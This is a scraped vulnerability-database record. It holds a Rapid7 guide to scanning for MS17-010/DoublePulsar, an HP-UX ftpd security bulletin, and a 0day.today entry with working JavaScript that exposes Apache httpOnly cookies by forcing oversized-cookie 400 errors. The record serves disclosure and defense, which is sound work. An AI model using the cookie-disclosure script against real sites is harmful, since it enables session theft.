Arial; color: #000000;\">DoublePulsar, a backdoor that has infected hundreds of thousands of computers, is one of the most nefarious of these tools: It can not only distribute ransomware but is also able to infect a system’s kernel to gain privileges and steal credentials. Identifying and patching vulnerable systems remains the best way to defend against the DoublePulsar implant. DoublePulsar is often delivered using the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue exploit package</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">—MS17-010—which is the same vulnerability that gave rise to the widespread WannaCry infections in May. To help customers, we are reiterating the steps we issued for WannaCry on creating a scan, dynamic asset group, and remediation project for identifying and fixing these vulnerabilities. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, you can <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. </span><span style=\"color: #1155cc; font-size: 11pt; font-family: Arial;\"><br/></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong>Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates > Manage Templates</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\"><img class=\"jive-image\" height=\"229\" src=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit without Web Spider. Don’t forget to give your copy a name and description; here, we’ll call it “Double Pulsar and WNCRY Scan Template”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\"><img class=\"jive-image\" height=\"247\" src=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\"><img class=\"jive-image\" height=\"275\" src=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then “By Individual Check”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\"><img class=\"jive-image\" height=\"265\" src=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check \"<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>\"</span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\"><img class=\"jive-image\" height=\"227\" src=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 195 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0148</span></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a Dynamic Asset Group for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> c</span><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">onsole, just under the search button:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\"><img class=\"jive-image\" height=\"157\" src=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a DoublePulsar/WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry and DoublePulsar, you could use this Dashboard filter:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" ORasset.vulnerability.title CONTAINS \"cve-2017-0146\"asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #231f20;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting. This will also apply to DoublePulsar</a>.</span></p><h2 dir=\"ltr\"></h2><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a Remediation Project for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the “Projects” tab and click “Create a Project”:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\"><img class=\"jive-image\" height=\"144\" src=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds <=> ( altId = \"ms17-010\" )\"</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\"><img class=\"jive-image\" height=\"456\" src=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now you can give this project a description and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.atlassian.com%2Fsoftware%2Fjira\" rel=\"nofollow\" target=\"_blank\">JIRA</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the vulnerability that enables both WannaCry and DoublePulsar infections. If you have any questions please don’t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on DoublePulsar, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>. </span></p></div><!-- [DocumentBodyEnd:53f4c57c-eea0-4790-a908-f2f47ce880e1] -->", "modified": "2017-06-23T21:23:11", "published": "2017-06-23T21:23:11", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/23/protecting-against-doublepulsar-infection-with-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "title": "Protecting against DoublePulsar infection with InsightVM and Nexpose", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-02T21:25:45", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category remote exploits", "modified": "2012-01-31T00:00:00", "published": "2012-01-31T00:00:00", "id": "1337DAY-ID-17469", "href": "https://0day.today/exploit/description/17469", "type": "zdt", "title": "Apache httpOnly Cookie Disclosure", "sourceData": "// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08\r\n// Most browsers limit cookies to 4k characters, so we need multiple\r\nfunction setCookies (good) {\r\n // Construct string for cookie value\r\n var str = \"\";\r\n for (var i=0; i< 819; i++) {\r\n str += \"x\";\r\n }\r\n // Set cookies\r\n for (i = 0; i < 10; i++) {\r\n // Expire evil cookie\r\n if (good) {\r\n var cookie = \"xss\"+i+\"=;expires=\"+new Date(+new Date()-1).toUTCString()+\"; path=/;\";\r\n }\r\n // Set evil cookie\r\n else {\r\n var cookie = \"xss\"+i+\"=\"+str+\";path=/\";\r\n }\r\n document.cookie = cookie;\r\n }\r\n}\r\nfunction makeRequest() {\r\n setCookies();\r\n function parseCookies () {\r\n var cookie_dict = {};\r\n // Only react on 400 status\r\n if (xhr.readyState === 4 && xhr.status === 400) {\r\n // Replace newlines and match <pre> content\r\n var content = xhr.responseText.replace(/\\r|\\n/g,'').match(/<pre>(.+)<\\/pre>/);\r\n if (content.length) {\r\n // Remove Cookie: prefix\r\n content = content[1].replace(\"Cookie: \", \"\");\r\n var cookies = content.replace(/xss\\d=x+;?/g, '').split(/;/g);\r\n // Add cookies to object\r\n for (var i=0; i<cookies.length; i++) {\r\n var s_c = cookies[i].split('=',2);\r\n cookie_dict[s_c[0]] = s_c[1];\r\n }\r\n }\r\n // Unset malicious cookies\r\n setCookies(true);\r\n alert(JSON.stringify(cookie_dict));\r\n }\r\n }\r\n // Make XHR request\r\n var xhr = new XMLHttpRequest();\r\n xhr.onreadystatechange = parseCookies;\r\n xhr.open(\"GET\", \"/\", true);\r\n xhr.send(null);\r\n}\r\nmakeRequest();\r\n\r\n\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17469"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHP SECURITY BULLETIN\r\n\r\nHPSBUX01119 REVISION: 0\r\n\r\nSSRT4694 rev.0 - HP-UX ftpd remote unauthorized access\r\n\r\nNOTICE:\r\nThere are no restrictions for distribution of this Security\r\nBulletin provided that it remains complete and intact.\r\n\r\nThe information in this Security Bulletin should be acted upon\r\nas soon as possible.\r\n\r\nINITIAL RELEASE:\r\n23 February 2005\r\n\r\nPOTENTIAL SECURITY IMPACT:\r\nremote unauthorized access\r\n\r\nSOURCE:\r\nHewlett-Packard Company\r\nHP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY:\r\nA potential vulnerability has been identified with HP-UX running\r\nftpd where the vulnerability could be exploited to allow a remote\r\nauthorized user unauthorized access to files.\r\n\r\nREFERENCES:\r\nNone\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.00, B.11.04, B.11.11, B.11.22, and B.11.23.\r\n\r\nBACKGROUND:\r\n\r\nNote: In addition to the versions of ftp delivered with HP-UX\r\n WU-FTPD 2.6 is available from software.hp.com:\r\n\r\n Overview\r\n WU-FTPD is the FTP daemon for HP-UX systems.\r\n WU-FTPD 2.6.1 is the latest version of WU-FTPD\r\n available on both HP-UX 11.0 and 11i v1 platforms. The\r\n IPv6-enabled version of WU-FTPD is available only on\r\n the HP-UX 11i v1 platform.\r\n\r\n AFFECTED VERSIONS\r\n\r\n Note: To determine if a system has an affected version,\r\n search the output of "swlist -a revision -l fileset"\r\n for an affected fileset. Then determine if the\r\n recommended patch or update is installed.\r\n\r\n HP-UX B.11.23\r\n =============\r\n InternetSrvcs.INETSVCS2-RUN\r\n action: install PHNE_30983 or subsequent.\r\n\r\n HP-UX B.11.22\r\n =============\r\n InternetSrvcs.INETSVCS2-RUN\r\n action: install PHNE_29462 or subsequent.\r\n\r\n HP-UX B.11.11\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_30990 or subsequent.\r\n\r\n WUFTP-26.INETSVCS-FTP\r\n action: install revision B.11.11.01.004 or subsequent.\r\n\r\n HP-UX B.11.04\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_32813 or subsequent.\r\n\r\n HP-UX B.11.00\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_30989 or subsequent.\r\n\r\n WUFTP-26.INETSVCS-FTP\r\n action: install revision B.11.00.01.004 or subsequent.\r\n\r\n\r\n END AFFECTED VERSIONS\r\n\r\nRESOLUTION:\r\nHP has made the following available to resolve the issue:\r\n\r\nHP-UX B.11.11 WU-FTPD 2.6.1 B.11.11.01.004\r\nHP-UX B.11.00 WU-FTPD 2.6.1 B.11.00.01.004\r\n available from http://software.hp.com/\r\n\r\nHP-UX B.11.23 PHNE_30983\r\nHP-UX B.11.22 PHNE_29462\r\nHP-UX B.11.11 PHNE_30990\r\nHP-UX B.11.04 PHNE_32813\r\nHP-UX B.11.00 PHNE_30989\r\n available from http://itrc.hp.com/\r\n\r\nMANUAL ACTIONS: Yes - Update\r\nIf WU-FTPD 2.6 is installed, update to:\r\n\r\nHP-UX B.11.11 WU-FTPD 2.6.1 B.11.11.01.004\r\nHP-UX B.11.00 WU-FTPD 2.6.1 B.11.00.01.004\r\n available from http://software.hp.com/\r\n\r\nBULLETIN REVISION HISTORY:\r\nRevision 0: 23 February 2005\r\n Initial release.\r\n\r\n\r\n\r\nHP-UX SPECIFIC SECURITY BULLETINS*: Security Patch Check revision\r\nB.02.00 analyzes all HP-issued Security Bulletins to provide a\r\nsubset of recommended actions that potentially affect a specific\r\nHP-UX system.\r\n\r\nFor more information:\r\nhttp://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/\r\ndisplayProductInfo.pl?productNumber=B6834AA\r\n\r\n\r\nSUPPORT: For further information, contact normal HP Services\r\nsupport channel.\r\n\r\nREPORT: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To obtain the security-alert PGP key please send an\r\ne-mail message to security-alert@hp.com with the Subject of\r\n'get key' (no quotes).\r\n\r\nSUBSCRIBE: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\n\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&\r\nlangcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\n\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your IRTC security bulletins and patches\r\n - check ALL categories for which alerts are required and\r\n continue.\r\nUnder Step2: your IRTC operating systems\r\n - verify your operating system selections are checked and\r\n save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\n\r\nLog in on the web page\r\n Subscriber's choice for Business: sign-in.\r\nOn the Web page:\r\n Subscriber's Choice: your profile summary\r\n - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\n relates to is represented by the 5th and 6th characters of the\r\n Bulletin number:\r\n GN = HP General SW,\r\n MA = HP Management Agents,\r\n MI = Misc. 3rd party SW,\r\n MP = HP MPE/iX,\r\n NS = HP NonStop Servers,\r\n OV = HP OpenVMS,\r\n PI = HP Printing & Imaging,\r\n ST = HP Storage SW,\r\n TL = HP Trusted Linux,\r\n TU = HP Tru64 UNIX,\r\n UX = HP-UX,\r\n VV = HP Virtual Vault\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP\r\nwill not be responsible for any damages resulting from user's use\r\nor disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability\r\nand fitness for a particular purpose, title and non-infringement."\r\n\r\n\r\n(c)Copyright 2005 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided "as is" without warranty of any kind. To the\r\nextent permitted by law, neither HP nor its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBQh3IcuAfOvwtKn1ZEQJn4QCgoQ9wFmICNRszKwdb/XByZmf8AIgAoKr3\r\n+gQwCVo5nf+DTBO7LaTf5vdr\r\n=cbzM\r\n-----END PGP SIGNATURE-----", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "SECURITYVULNS:DOC:7919", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7919", "title": "[Security Bulletin] SSRT4694 HP-UX ftpd remote unauthorized access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Buffer overflow in debug mode, unauthorized files access.", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "SECURITYVULNS:VULN:4294", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4294", "title": "HP-UX ftpd FTP server multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
